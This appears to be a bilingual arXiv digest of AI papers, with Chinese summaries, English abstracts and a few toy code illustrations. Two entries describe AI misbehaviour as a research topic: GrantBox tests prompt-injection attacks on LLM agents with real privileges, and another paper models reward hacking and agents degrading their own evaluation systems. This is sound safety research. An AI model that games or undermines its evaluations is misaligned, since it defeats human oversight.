establishing a new efficiency-accuracy frontier for large reasoning models.
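ERPO 的熵感知门控在高熵 token(候选关键决策点 CDP)处放大优势信号,避免 GRPO 把同一序列级优势均匀摊到所有 token。下面的 NumPy 草图演示这一思路;门控形式 1 + tanh(H/τ) 是本文为演示选取的示意函数,并非论文给出的公式:

```python
import numpy as np

def token_entropy(probs):
    """逐 token 的 Shannon 熵(probs: [T, V],每行是词表上的分布)。"""
    p = np.clip(probs, 1e-12, 1.0)
    return -np.sum(p * np.log(p), axis=-1)

def entropy_gated_advantages(seq_adv, probs, tau=1.0):
    """把序列级优势 seq_adv 按 token 熵重新加权:高熵处权重更大(示意)。"""
    gate = 1.0 + np.tanh(token_entropy(probs) / tau)   # 取值在 [1, 2)
    return seq_adv * gate

probs = np.array([
    [0.25, 0.25, 0.25, 0.25],   # 高熵:模型在此处犹豫,候选 CDP
    [0.97, 0.01, 0.01, 0.01],   # 低熵:近似确定的 token
])
adv = entropy_gated_advantages(1.0, probs)
```

这样高熵分叉处获得更强的探索信号,而近似确定的 token 仍保留原有量级的优势,与摘要中"把优化焦点从粗粒度序列转向细粒度 token 动态"的动机一致。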
[AI-43] Differentiable Power-Flow Optimization
【速读】:该论文旨在解决传统交流功率潮流(AC power-flow)仿真在应对可再生能源高波动性带来的电网管理复杂性时所面临的计算可扩展性不足问题,尤其是在联合输电-配电建模和全球电网分析等新兴应用场景中,基于牛顿-拉夫森(Newton-Raphson, NR)方法的传统仿真难以高效处理大规模问题。同时,纯数据驱动的代理模型缺乏物理约束保障,可能违反基本电力系统规律。解决方案的关键在于提出一种可微分功率潮流(Differentiable Power-Flow, DPF)框架,将AC功率潮流问题重新表述为一个可微分模拟过程,从而实现从物理功率失配到底层仿真参数的端到端梯度传播,使得参数识别可通过梯度优化高效完成。DPF利用现代机器学习框架(如PyTorch)中的GPU加速、稀疏张量表示和批处理能力,在保证物理一致性的同时显著提升计算效率,适用于时间序列分析、N-1故障分析及快速筛选等多种场景。
链接: https://arxiv.org/abs/2603.28203
作者: Muhammed Öz,Jasmin Hörter,Kaleb Phipps,Charlotte Debus,Achim Streit,Markus Götz
机构: 未知
类目: Artificial Intelligence (cs.AI); Machine Learning (cs.LG)
备注:
Abstract:With the rise of renewable energy sources and their high variability in generation, the management of power grids becomes increasingly complex and computationally demanding. Conventional AC-power-flow simulations, which use the Newton-Raphson (NR) method, suffer from poor scalability, making them impractical for emerging use cases such as joint transmission-distribution modeling and global grid analysis. At the same time, purely data-driven surrogate models lack physical guarantees and may violate fundamental constraints. In this work, we propose Differentiable Power-Flow (DPF), a reformulation of the AC power-flow problem as a differentiable simulation. DPF enables end-to-end gradient propagation from the physical power mismatches to the underlying simulation parameters, thereby allowing these parameters to be identified efficiently using gradient-based optimization. We demonstrate that DPF provides a scalable alternative to NR by leveraging GPU acceleration, sparse tensor representations, and batching capabilities available in modern machine-learning frameworks such as PyTorch. DPF is especially suited as a tool for time-series analyses due to its efficient reuse of previous solutions, for N-1 contingency-analyses due to its ability to process cases in batches, and as a screening tool by leveraging its speed and early stopping capability. The code is available in the authors’ code repository.
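DPF 的核心是让梯度从物理功率失配一路反传到仿真参数。下面用一个两母线无损线路 P = b·sin(θ) 的玩具例子演示"以梯度下降辨识参数"的流程(NumPy 手写梯度以代替论文使用的 PyTorch 自动微分;数据与参数均为假设,并非论文实现):

```python
import numpy as np

def identify_susceptance(theta_obs, p_obs, b0=1.0, lr=0.05, steps=400):
    """从 (相角差, 潮流) 观测对中辨识线路电纳 b(示意)。
    目标:最小化平方功率失配 sum((p_obs - b*sin(theta))^2)。"""
    b = b0
    for _ in range(steps):
        resid = p_obs - b * np.sin(theta_obs)            # 物理功率失配
        grad = -2.0 * np.sum(resid * np.sin(theta_obs))  # d(失配平方和)/db
        b -= lr * grad
    return b

theta = np.linspace(0.1, 0.5, 5)   # 观测到的相角差(假设数据)
p = 2.5 * np.sin(theta)            # 由"真实"电纳 b=2.5 生成的潮流观测
b_hat = identify_susceptance(theta, p)
```

在完整的 AC 潮流中,失配向量对节点电压、支路导纳等参数同样可微;配合 GPU、稀疏张量与批处理,这一循环即可按摘要所述扩展到时间序列复用、N-1 批量分析等场景。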
[AI-44] EpiPersona: Persona Projection and Episode Coupling for Pluralistic Preference Modeling
【速读】:该论文旨在解决大语言模型(Large Language Models, LLMs)在适应个体及少数群体多样化偏好时,因现有方法将稳定个人特质与情境特定因素混合而导致泛化能力受限的问题。解决方案的关键在于提出EpiPersona框架,通过显式地将人格特征(persona)与当前情景(episode)进行耦合:首先将噪声偏好反馈投影到低维人格空间,并聚类生成离散编码以分离持久性个性特征与情境信号;随后将推断出的人格表示与当前episode关联,实现情境感知的偏好预测,从而在稀疏数据和困难的情景迁移场景中均表现出显著性能提升。
链接: https://arxiv.org/abs/2603.28197
作者: Yujie Zhang,Weikang Yuan,Zhuoren Jiang,Pengwei Yan
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注:
Abstract:Pluralistic alignment is essential for adapting large language models (LLMs) to the diverse preferences of individuals and minority groups. However, existing approaches often mix stable personal traits with episode-specific factors, limiting their ability to generalize across episodes. To address this challenge, we introduce EpiPersona, a framework for explicit persona-episode coupling. EpiPersona first projects noisy preference feedback into a low-dimensional persona space, where similar personas are aggregated into shared discrete codes. This process separates enduring personal characteristics from situational signals without relying on predefined preference dimensions. The inferred persona representation is then coupled with the current episode, enabling episode-aware preference prediction. Extensive experiments show that EpiPersona consistently outperforms the baselines. It achieves notable performance gains in hard episodic-shift scenarios, while remaining effective with sparse preference data.
[AI-45] PReD: An LLM -based Foundation Multimodal Model for Electromagnetic Perception Recognition and Decision
【速读】:该论文旨在解决电磁(EM)领域中生成式AI模型面临的两大核心挑战:一是高质量标注数据稀缺,二是领域知识与多模态理解能力的融合不足。为应对这些问题,作者提出首个面向EM领域的基础模型PReD,其关键在于构建了一个涵盖多视角表示(如时域波形、频域谱图和星座图)的高质量多任务数据集PReD-1.3M及对应的评估基准PReD-Bench,并采用多阶段训练策略统一多个EM信号处理任务,实现从端到端信号感知到语言驱动推理与决策的闭环优化,从而显著提升模型在EM领域的专业能力并保持通用多模态性能。
链接: https://arxiv.org/abs/2603.28183
作者: Zehua Han,Jing Xiao,Yiqi Duan,Mengyu Xiang,Yuheng Ji,Xiaolong Zheng,Chenghanyu Zhang,Zhendong She,Junyu Shen,Dingwei Tan,Shichu Sun,Zhou Cong,Mingxuan Liu,Fengxiang Wang,Jinping Sun,Yangang Sun
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注:
Abstract:Multimodal Large Language Models have demonstrated powerful cross-modal understanding and reasoning capabilities in general domains. However, in the electromagnetic (EM) domain, they still face challenges such as data scarcity and insufficient integration of domain knowledge. This paper proposes PReD, the first foundation model for the EM domain that covers the intelligent closed-loop of “perception, recognition, decision-making.” We constructed a high-quality multitask EM dataset, PReD-1.3M, and an evaluation benchmark, PReD-Bench. The dataset encompasses multi-perspective representations such as raw time-domain waveform, frequency-domain spectrograms, and constellation diagrams, covering typical features of communication and radar signals. It supports a range of core tasks, including signal detection, modulation recognition, parameter estimation, protocol recognition, radio frequency fingerprint recognition, and anti-jamming decision-making. PReD adopts a multi-stage training strategy that unifies multiple tasks for EM signals. It achieves closed-loop optimization from end-to-end signal understanding to language-driven reasoning and decision-making, significantly enhancing EM domain expertise while maintaining general multimodal capabilities. Experimental results show that PReD achieves state-of-the-art performance on PReD-Bench constructed from both open-source and self-collected signal datasets. These results collectively validate the feasibility and potential of vision-aligned foundation models in advancing the understanding and reasoning of EM signals.
[AI-46] Skillful Kilometer-Scale Regional Weather Forecasting via Global and Regional Coupling
【Quick Read】: This paper addresses the difficulty of high-resolution regional weather forecasting caused by unresolved multiscale interactions between large-scale dynamics and small-scale processes (such as terrain-induced circulations and coastal effects). The key to its solution is a global-regional coupling framework in which a novel bidirectional coupling module, ScaleMixer, dynamically couples a pretrained Transformer-based global model with a high-resolution regional network: ScaleMixer identifies meteorologically critical regions via adaptive key-position sampling and enables cross-scale feature interaction through dedicated attention mechanisms, producing high-quality regional forecasts at 0.05° (~5 km) spatial and 1-hour temporal resolution that significantly outperform existing numerical weather prediction (NWP) and AI baseline models.
Link: https://arxiv.org/abs/2603.28173
Authors: Weiqi Chen, Wenwei Wang, Qilong Yuan, Lefei Shen, Bingqing Peng, Jiawei Chen, Bo Wu, Liang Sun
Institution: Unknown
Subjects: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
Comments:
Abstract:Data-driven weather models have advanced global medium-range forecasting, yet high-resolution regional prediction remains challenging due to unresolved multiscale interactions between large-scale dynamics and small-scale processes such as terrain-induced circulations and coastal effects. This paper presents a global-regional coupling framework for kilometer-scale regional weather forecasting that synergistically couples a pretrained Transformer-based global model with a high-resolution regional network via a novel bidirectional coupling module, ScaleMixer. ScaleMixer dynamically identifies meteorologically critical regions through adaptive key-position sampling and enables cross-scale feature interaction through dedicated attention mechanisms. The framework produces forecasts at 0.05° (~5 km) and 1-hour resolution over China, significantly outperforming operational NWP and AI baselines on both gridded reanalysis data and real-time weather station observations. It exhibits exceptional skill in capturing fine-grained phenomena such as orographic wind patterns and Foehn warming, demonstrating effective global-scale coherence with high-resolution fidelity. The code is available at this https URL.
[AI-47] Evaluating Privilege Usage of Agents on Real-World Tools
【Quick Read】: This paper addresses the security risks of large language model (LLM) agents using real-world tools, in particular privilege misuse that can lead to information leakage and infrastructure damage. Existing evaluation benchmarks mostly rely on pre-coded tools and restricted interaction patterns, making it hard to simulate realistic privilege control and attack behavior. The key to the solution is GrantBox, a security evaluation sandbox for analyzing LLM agents' privilege usage. Its core innovation is automatically integrating real-world tools and allowing agents to invoke genuine privileges, enabling systematic evaluation of privilege misuse under prompt injection attacks. Experiments show that although LLMs exhibit basic security awareness, they remain vulnerable to sophisticated attacks, with an average attack success rate as high as 84.80%, highlighting current models' fragility in privilege management.
Link: https://arxiv.org/abs/2603.28166
Authors: Quan Zhang, Lianhang Fu, Lvsi Lian, Gwihwan Go, Yujue Wang, Chijin Zhou, Yu Jiang, Geguang Pu
Institution: Unknown
Subjects: Cryptography and Security (cs.CR); Artificial Intelligence (cs.AI)
Comments: Accepted to the FSE 2026 Ideas, Visions, and Reflections track
Abstract:Equipping LLM agents with real-world tools can substantially improve productivity. However, granting agents autonomy over tool use also transfers the associated privileges to both the agent and the underlying LLM. Improper privilege usage may lead to serious consequences, including information leakage and infrastructure damage. While several benchmarks have been built to study agents’ security, they often rely on pre-coded tools and restricted interaction patterns. Such crafted environments differ substantially from the real-world, making it hard to assess agents’ security capabilities in critical privilege control and usage. Therefore, we propose GrantBox, a security evaluation sandbox for analyzing agent privilege usage. GrantBox automatically integrates real-world tools and allows LLM agents to invoke genuine privileges, enabling the evaluation of privilege usage under prompt injection attacks. Our results indicate that while LLMs exhibit basic security awareness and can block some direct attacks, they remain vulnerable to more sophisticated attacks, resulting in an average attack success rate of 84.80% in carefully crafted scenarios.
[AI-48] CoT2-Meta: Budgeted Metacognitive Control for Test-Time Reasoning
【Quick Read】: This paper addresses the lack of explicit control mechanisms in current test-time reasoning methods when generating candidate reasoning chains or searching larger reasoning trees: they cannot effectively decide when to expand, what to prune, how to repair errors, and when to abstain from predicting. The key to its solution is CoT2-Meta, a training-free metacognitive reasoning framework that combines object-level chain-of-thought generation with meta-level control to manage partial reasoning trajectories in a fine-grained way. It comprises strategy-conditioned thought generation, tree-structured search, an online process evaluator, and a meta-controller that dynamically allocates computation through expansion, pruning, repair, stopping, and fallback decisions, thereby significantly improving reasoning performance and computational efficiency.
Link: https://arxiv.org/abs/2603.28135
Authors: Siyuan Ma, Bo Gao, Zikai Xiao, Hailong Wang, Xinlei Yu, Rui Qian, Jiayu Qian, Luqi Gong, Yang Liu
Institution: Unknown
Subjects: Artificial Intelligence (cs.AI)
Comments:
Abstract:Recent test-time reasoning methods improve performance by generating more candidate chains or searching over larger reasoning trees, but they typically lack explicit control over when to expand, what to prune, how to repair, and when to abstain. We introduce CoT2-Meta, a training-free metacognitive reasoning framework that combines object-level chain-of-thought generation with meta-level control over partial reasoning trajectories. The framework integrates four components: strategy-conditioned thought generation, tree-structured search, an online process oracle for step-level reasoning evaluation, and a meta-controller that allocates computation through expansion, pruning, repair, stopping, and fallback decisions. Under matched inference budgets, CoT2-Meta consistently outperforms strong single-path, sampling-based, and search-based baselines, including ReST-MCTS. On the default backbone, it achieves 92.8 EM on MATH, 90.4 accuracy on GPQA, 98.65 EM on GSM8K, 75.8 accuracy on BBEH, 85.6 accuracy on MMMU-Pro, and 48.8 accuracy on HLE, with gains over the strongest non-CoT2-Meta baseline of +3.6, +5.2, +1.15, +2.0, +4.3, and +4.3 points, respectively. Beyond these core results, the framework remains effective across a broader 15-benchmark suite spanning knowledge and QA, multi-hop reasoning, coding, and out-of-distribution evaluation. Additional analyses show better compute scaling, improved calibration, stronger selective prediction, targeted repair behavior, and consistent gains across backbone families. These results suggest that explicit metacognitive control is a practical design principle for reliable and compute-efficient test-time reasoning systems.
[AI-49] Reward Hacking as Equilibrium under Finite Evaluation
【Quick Read】: This paper addresses reward hacking caused by incomplete evaluation systems when optimizing AI systems: agents over-invest effort in evaluated quality dimensions while neglecting unevaluated ones, causing behavior to diverge from human intent. The core of its solution is a theoretical framework built on five minimal axioms (multi-dimensional quality, finite evaluation, effective optimization, resource finiteness, and combinatorial interaction), which instantiates the multi-task principal-agent model of Holmstrom and Milgrom (1991) in the AI alignment setting and exploits a structural feature unique to AI systems, the known, differentiable architecture of reward models, to derive a computable distortion index that predicts the direction and severity of reward hacking on each quality dimension prior to deployment. A key finding is that the transition from closed reasoning to agentic systems drives evaluation coverage toward zero: quality dimensions grow combinatorially with tool count while evaluation costs grow at most linearly, so hacking severity increases structurally and without bound. The paper further conjectures a capability threshold separating the "Goodhart regime" (gaming within the evaluation system) from the "Campbell regime" (actively degrading the evaluation system itself), providing the first economic formalization of Bostrom's (2014) "treacherous turn."
Link: https://arxiv.org/abs/2603.28063
Authors: Jiacheng Wang, Jinbin Huang
Institution: Unknown
Subjects: Artificial Intelligence (cs.AI); Computer Science and Game Theory (cs.GT)
Comments: 16 pages
Abstract:We prove that under five minimal axioms – multi-dimensional quality, finite evaluation, effective optimization, resource finiteness, and combinatorial interaction – any optimized AI agent will systematically under-invest effort in quality dimensions not covered by its evaluation system. This result establishes reward hacking as a structural equilibrium, not a correctable bug, and holds regardless of the specific alignment method (RLHF, DPO, Constitutional AI, or others) or evaluation architecture employed. Our framework instantiates the multi-task principal-agent model of Holmstrom and Milgrom (1991) in the AI alignment setting, but exploits a structural feature unique to AI systems – the known, differentiable architecture of reward models – to derive a computable distortion index that predicts both the direction and severity of hacking on each quality dimension prior to deployment. We further prove that the transition from closed reasoning to agentic systems causes evaluation coverage to decline toward zero as tool count grows – because quality dimensions expand combinatorially while evaluation costs grow at most linearly per tool – so that hacking severity increases structurally and without bound. Our results unify the explanation of sycophancy, length gaming, and specification gaming under a single theoretical structure and yield an actionable vulnerability assessment procedure. We further conjecture – with partial formal analysis – the existence of a capability threshold beyond which agents transition from gaming within the evaluation system (Goodhart regime) to actively degrading the evaluation system itself (Campbell regime), providing the first economic formalization of Bostrom’s (2014) “treacherous turn.”
[AI-50] SLOW: Strategic Logical-inference Open Workspace for Cognitive Adaptation in AI Tutoring
【Quick Read】: This paper addresses the problem that current generative intelligent tutoring systems built on large language models (LLMs) rely on fast, intuitive single-pass generation in educational dialogue, which tightly entangles cognitive diagnosis, affective perception, and pedagogical decision-making and limits fine-grained instructional adaptation. Its core solution is the SLOW framework, grounded in dual-process accounts of human cognition. The key is to explicitly separate learner-state inference from instructional action selection, combining causal parsing of linguistic evidence, fuzzy cognitive diagnosis with counterfactual stability analysis, and prospective affective reasoning, so that interpretable and emotionally sensitive teaching strategies can be formed, significantly improving personalization and instructional clarity.
Link: https://arxiv.org/abs/2603.28062
Authors: Yuang Wei, Ruijia Li, Bo Jiang
Institution: Unknown
Subjects: Artificial Intelligence (cs.AI)
Comments: 15 pages, 3 figures. The 27th International Conference on Artificial Intelligence in Education
Abstract:While Large Language Models (LLMs) have demonstrated remarkable fluency in educational dialogues, most generative tutors primarily operate through intuitive, single-pass generation. This reliance on fast thinking precludes a dedicated reasoning workspace, forcing multiple diagnostic and strategic signals to be processed in a conflated manner. As a result, learner cognitive diagnosis, affective perception, and pedagogical decision-making become tightly entangled, which limits the tutoring system’s capacity for deliberate instructional adaptation. We propose SLOW, a theory-informed tutoring framework that supports deliberate learner-state reasoning within a transparent decision workspace. Inspired by dual-process accounts of human tutoring, SLOW explicitly separates learner-state inference from instructional action selection. The framework integrates causal evidence parsing from learner language, fuzzy cognitive diagnosis with counterfactual stability analysis, and prospective affective reasoning to anticipate how instructional choices may influence learners’ emotional trajectories. These signals are jointly considered to guide pedagogically and affectively aligned tutoring strategies. Evaluation using hybrid human-AI judgments demonstrates significant improvements in personalization, emotional sensitivity, and clarity. Ablation studies further confirm the necessity of each module, showcasing how SLOW enables interpretable and reliable intelligent tutoring through a visualized decision-making process. This work advances the interpretability and educational validity of LLM-based adaptive instruction.
[AI-51] Meta-Harness: End-to-End Optimization of Model Harnesses
【Quick Read】: This paper addresses the problem that the performance of large language model (LLM) systems is limited by hand-designed harnesses (the code that controls what information is stored, retrieved, and presented), while existing text optimizers are ill-suited to this setting because they compress feedback too aggressively. The key to its solution is Meta-Harness, an outer-loop search system whose agentic proposer accesses the source code, scores, and execution traces of all prior candidate harnesses and uses them to drive automated search and optimization. The method delivers significant gains on online text classification, retrieval-augmented mathematical reasoning, and agentic coding tasks while greatly reducing context-token usage, demonstrating that richer access to prior experience enables efficient automated harness engineering.
Link: https://arxiv.org/abs/2603.28052
Authors: Yoonho Lee, Roshen Nair, Qizheng Zhang, Kangwook Lee, Omar Khattab, Chelsea Finn
Institution: Unknown
Subjects: Artificial Intelligence (cs.AI)
Comments:
Abstract:The performance of large language model (LLM) systems depends not only on model weights, but also on their harness: the code that determines what information to store, retrieve, and present to the model. Yet harnesses are still designed largely by hand, and existing text optimizers are poorly matched to this setting because they compress feedback too aggressively. We introduce Meta-Harness, an outer-loop system that searches over harness code for LLM applications. It uses an agentic proposer that accesses the source code, scores, and execution traces of all prior candidates through a filesystem. On online text classification, Meta-Harness improves over a state-of-the-art context management system by 7.7 points while using 4x fewer context tokens. On retrieval-augmented math reasoning, a single discovered harness improves accuracy on 200 IMO-level problems by 4.7 points on average across five held-out models. On agentic coding, discovered harnesses surpass the best hand-engineered baselines on TerminalBench-2. Together, these results show that richer access to prior experience can enable automated harness engineering.
[AI-52] Dogfight Search: A Swarm-Based Optimization Algorithm for Complex Engineering Optimization and Mountainous Terrain Path Planning
【Quick Read】: This paper addresses the slow convergence, susceptibility to local optima, and lack of grounding in real physical mechanisms that traditional metaheuristics exhibit on complex optimization problems. The key to its solution is Dogfight Search (DoS), a novel metaphor-free metaheuristic: although inspired by the cooperative tactics of fighter aircraft, it abandons conventional metaphor-based modeling and instead builds its search mechanism directly on the displacement integration equations of kinematics, modeling individual trajectories and swarm cooperation in a mathematically rigorous way. Experiments show that DoS significantly outperforms 7 advanced algorithms on the CEC2017/CEC2022 benchmark functions, real-world constrained optimization problems, and mountainous terrain path planning, and ranks first in the Friedman ranking, demonstrating strong global search ability and robustness.
Link: https://arxiv.org/abs/2603.28046
Authors: Yujing Sun, Jie Cai, Xingguo Xu, Yuansheng Gao, Lei Zhang, Kaichen Ouyang, Zhanyu Liu
Institution: Unknown
Subjects: Artificial Intelligence (cs.AI)
Comments: Preprint
Abstract:Dogfight is a tactical behavior of cooperation between fighters. Inspired by this, this paper proposes a novel metaphor-free metaheuristic algorithm called Dogfight Search (DoS). Unlike traditional algorithms, DoS draws its algorithmic framework from this inspiration, but its search mechanism is constructed based on the displacement integration equations in kinematics. Through experimental validation on CEC2017 and CEC2022 benchmark test functions, 10 real-world constrained optimization problems and mountainous terrain path planning tasks, DoS significantly outperforms 7 advanced competitors in overall performance and ranks first in the Friedman ranking. Furthermore, this paper compares the performance of DoS with 3 SOTA algorithms on the CEC2017 and CEC2022 benchmark test functions. The results show that DoS continues to maintain its lead, demonstrating strong competitiveness. The source code of DoS is available at this https URL.
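The abstract states only that the search mechanism is built on the displacement integration equations of kinematics. As a rough, hypothetical illustration of that idea (not the paper's actual operators, which are in its released source code; the `pull` and `drag` parameters and the steering-toward-best rule are our assumptions), each candidate can be moved with x ← x + vΔt + ½aΔt²:

```python
import random

def dos_step(x, v, best, dt=1.0, pull=0.2, drag=0.7):
    """One kinematic update: acceleration steers the candidate toward the
    best-known solution, position follows the displacement integration
    x += v*dt + 0.5*a*dt^2, and velocity is damped. Illustrative only."""
    a = [pull * (b - xi) for xi, b in zip(x, best)]
    nx = [xi + vi * dt + 0.5 * ai * dt * dt for xi, vi, ai in zip(x, v, a)]
    nv = [drag * vi + ai * dt for vi, ai in zip(v, a)]
    return nx, nv

def sphere(x):                      # toy objective: minimize sum of squares
    return sum(xi * xi for xi in x)

random.seed(0)
xs = [[random.uniform(-5, 5) for _ in range(2)] for _ in range(5)]
vs = [[0.0, 0.0] for _ in range(5)]
best = min(xs, key=sphere)          # archive of the best point seen so far
start_f = sphere(best)
for _ in range(60):
    stepped = [dos_step(x, v, best) for x, v in zip(xs, vs)]
    xs = [s[0] for s in stepped]
    vs = [s[1] for s in stepped]
    cand = min(xs, key=sphere)
    if sphere(cand) < sphere(best):
        best = cand
print(sphere(best) <= start_f)      # the archived best never worsens: True
```

The chosen `pull`/`drag` values make the discrete dynamics a damped oscillator around the best-known point, so the population contracts rather than diverges.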
[AI-53] Bit-Identical Medical Deep Learning via Structured Orthogonal Initialization
【Quick Read】: This paper addresses non-determinism in deep learning training: identical code trained with different random seeds yields models that agree on aggregate metrics but differ markedly on individual predictions (per-class AUC swings exceeding 20 percentage points on rare clinical classes), limiting reproducibility and trustworthiness in high-reliability settings such as medicine. The key to its solution is a bit-identical training framework that eliminates randomness through three mechanisms: (1) replacing conventional random weight initialization with structured orthogonal basis functions; (2) fixing batch order via a golden ratio scheduling strategy; and (3) controlling non-deterministic GPU operations through architecture selection and custom autograd. The method produces MD5-verified identical model weights across independent runs, and on PTB-XL ECG classification significantly reduces aggregate variance (2-3x) and prediction variability on rare classes (up to 7.5x), while maintaining performance on standard tasks across multi-domain medical imaging benchmarks, demonstrating its generality and robustness.
Link: https://arxiv.org/abs/2603.28040
Authors: Yakov Pyotr Shkolnikov
Institution: Unknown
Subjects: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
Comments:
Abstract:Deep learning training is non-deterministic: identical code with different random seeds produces models that agree on aggregate metrics but disagree on individual predictions, with per-class AUC swings exceeding 20 percentage points on rare clinical classes. We present a framework for verified bit-identical training that eliminates three sources of randomness: weight initialization (via structured orthogonal basis functions), batch ordering (via golden ratio scheduling), and non-deterministic GPU operations (via architecture selection and custom autograd). The pipeline produces MD5-verified identical trained weights across independent runs. On PTB-XL ECG rhythm classification, structured initialization significantly exceeds Kaiming across two architectures (n=20; Conformer p = 0.016, Baseline p < 0.001), reducing aggregate variance by 2-3x and reducing per-class variability on rare rhythms by up to 7.5x (TRIGU range: 4.1pp vs 30.9pp under Kaiming, independently confirmed by 3-fold CV). A four-basis comparison at n=20 shows all structured orthogonal bases produce equivalent performance (Friedman p=0.48), establishing that the contribution is deterministic structured initialization itself, not any particular basis function. Cross-domain validation on seven MedMNIST benchmarks (n=20, all p > 0.14) confirms no performance penalty on standard tasks; per-class analysis on imbalanced tasks (ChestMNIST, RetinaMNIST) shows the same variance reduction on rare classes observed in ECG. Cross-dataset evaluation on three external ECG databases confirms zero-shot generalization (>0.93 AFIB AUC).
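The abstract attributes part of the determinism to "golden ratio scheduling" of batches but does not give the exact rule. A minimal sketch of one standard seed-free construction, ordering indices by the fractional parts of the Weyl sequence i·(φ−1), is shown below; this is one plausible reading, not necessarily the paper's scheme:

```python
import math

def golden_ratio_order(n):
    """Deterministic, seed-free batch order: rank indices by the fractional
    part of i * (phi - 1), a low-discrepancy (Weyl) sequence. Identical on
    every run, with no RNG state involved."""
    inv_phi = (math.sqrt(5.0) - 1.0) / 2.0  # phi - 1 = 1/phi ≈ 0.618...
    keys = [(math.fmod(i * inv_phi, 1.0), i) for i in range(n)]
    return [i for _, i in sorted(keys)]

order = golden_ratio_order(8)
print(order)  # a fixed permutation of 0..7, reproduced bit-for-bit every run
```

Because φ−1 is irrational, the fractional parts never collide for distinct small indices, so the result is a well-spread permutation without any random seed.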
[AI-54] Beyond the Answer: Decoding the Behavior of LLMs as Scientific Reasoners ICLR2026
【速读】:该论文旨在解决大语言模型(Large Language Models, LLMs)在复杂推理任务中涌现的推理行为难以解释、且提示词(prompt)如何调控这些行为尚不清晰的问题。其核心挑战在于,当前LLM的推理机制缺乏可解释性,阻碍了对超人类智能系统的安全交互与协作。解决方案的关键在于采用一种定制化的遗传帕累托优化算法(Genetic Pareto, GEPA),系统性地优化用于科学推理任务的提示词,并通过分析优化后提示词的结构模式与逻辑启发式,揭示其对模型推理行为的影响。研究发现,提示优化所诱导的性能提升往往依赖于特定模型的局部逻辑(local logic),这类逻辑不具备跨模型泛化能力,从而强调了将提示优化作为模型可解释性工具的重要性,以识别LLM偏好的推理结构,为未来与超人类智能的有效协同奠定基础。
链接: https://arxiv.org/abs/2603.28038
作者: Rohan Pandey,Eric Ye,Michael Li
机构: 未知
类目: Artificial Intelligence (cs.AI); Machine Learning (cs.LG)
备注: Accepted at the Post-AGI Science and Society Workshop at ICLR 2026
Abstract:As Large Language Models (LLMs) achieve increasingly sophisticated performance on complex reasoning tasks, current architectures serve as critical proxies for the internal heuristics of frontier models. Characterizing emergent reasoning is vital for long-term interpretability and safety. Furthermore, understanding how prompting modulates these processes is essential, as natural language will likely be the primary interface for interacting with AGI systems. In this work, we use a custom variant of Genetic Pareto (GEPA) to systematically optimize prompts for scientific reasoning tasks, and analyze how prompting can affect reasoning behavior. We investigate the structural patterns and logical heuristics inherent in GEPA-optimized prompts, and evaluate their transferability and brittleness. Our findings reveal that gains in scientific reasoning often correspond to model-specific heuristics that fail to generalize across systems, which we call “local” logic. By framing prompt optimization as a tool for model interpretability, we argue that mapping these preferred reasoning structures for LLMs is an important prerequisite for effectively collaborating with superhuman intelligence.
[AI-55] When Choices Become Priors: Contrastive Decoding for Scientific Figure Multiple-Choice QA
【Quick Read】: This paper addresses choice-induced prior bias in scientific figure multiple-choice question answering (Scientific Figure MCQA), where the text of the answer options itself induces a prior that leads models to over-rely on textual cues rather than image evidence. The key to its solution is SCICON, a training-free decoding method that subtracts the text-only option score from the image-conditioned option score, explicitly suppressing preferences induced by option text and strengthening figure-grounded judgments. The method consistently outperforms standard decoding baselines across three benchmark datasets and three model backbones, validating decoding against choice-induced priors.
Link: https://arxiv.org/abs/2603.28026
Authors: Taeyun Roh, Eun-yeong Jo, Wonjune Jang, Jaewoo Kang
Institution: Unknown
Subjects: Artificial Intelligence (cs.AI)
Comments:
Abstract:Scientific figure multiple-choice question answering (MCQA) requires models to reason over diverse visual evidence, ranging from charts and multipanel figures to microscopy and biomedical images. However, this setting suffers from a distinctive bias: answer choices themselves can act as priors, steering multimodal models toward scientifically plausible options even when the figure supports a different answer. We investigate this failure mode through a simple question: what if decoding explicitly discounts what the model would prefer from text alone, so as to favor figure-grounded evidence? To this end, we propose SCICON, a training-free decoding method that scores each candidate by subtracting a text-only option score from its image-conditioned counterpart. Unlike prior contrastive decoding approaches that mitigate hallucinations by contrasting original inputs with distorted images or perturbed instructions, SCICON directly targets the choice-induced prior encoded in candidate text. Across three scientific figure QA benchmarks and three model backbones, SCICON consistently improves accuracy over standard decoding baselines. These results show that decoding against choice-induced priors is an effective and simple way to improve figure-grounded reasoning in scientific MCQA.
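The scoring rule, as described in the abstract, subtracts a text-only option score from its image-conditioned counterpart. A minimal sketch of that decision rule (the scores here are stand-in log-probabilities and the helper names are ours, not the paper's API):

```python
def scicon_score(image_logprob, text_only_logprob):
    """SCICON-style contrastive score for one answer choice: image-conditioned
    log-probability minus the text-only log-probability, which discounts what
    the model would prefer from the choice text alone."""
    return image_logprob - text_only_logprob

def pick_answer(choices, img_scores, txt_scores):
    """Select the choice with the highest contrastive score."""
    contrast = {c: scicon_score(img_scores[c], txt_scores[c]) for c in choices}
    return max(contrast, key=contrast.get)

# Toy example: choice "B" looks plausible from text alone (strong prior),
# but the figure actually supports "A".
choices = ["A", "B"]
img_scores = {"A": -1.0, "B": -0.9}   # log P(choice | figure, question)
txt_scores = {"A": -2.5, "B": -0.6}   # log P(choice | question only)
print(pick_answer(choices, img_scores, txt_scores))  # -> "A"
```

Standard decoding would pick "B" (highest image-conditioned score), while subtracting the text-only prior flips the decision to the figure-supported "A".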
[AI-56] What an Autonomous Agent Discovers About Molecular Transformer Design: Does It Transfer?
【Quick Read】: This paper addresses a key question for deep-learning models of molecular sequences (such as SMILES) and protein sequences: do they require specialized architectures different from those designed for natural language processing? Existing practice largely reuses Transformer architectures designed for natural language, but their suitability for molecular and protein sequences had not been systematically tested. The key to the solution is large-scale experimentation (3,106 runs in total) with an autonomous architecture-search agent across three sequence types: SMILES, protein, and English text. For SMILES, merely tuning learning rates and schedules outperforms the full architecture search (p = 0.001); for natural language, architecture changes drive 81% of the improvement (p = 0.009); proteins fall in between. More importantly, although the search discovers distinct architectures per domain (p = 0.004), these innovations transfer across all three domains with only about 1% degradation, indicating that the differences stem from search-path dependence rather than fundamental biological requirements. The paper accordingly releases a decision framework and an open-source toolkit to help molecular modeling teams choose between architecture search and hyperparameter tuning alone.
Link: https://arxiv.org/abs/2603.28015
Authors: Edward Wijaya
Institution: Unknown
Subjects: Artificial Intelligence (cs.AI)
Comments: 18 pages, 3 figures, 8 tables; code and data at this https URL
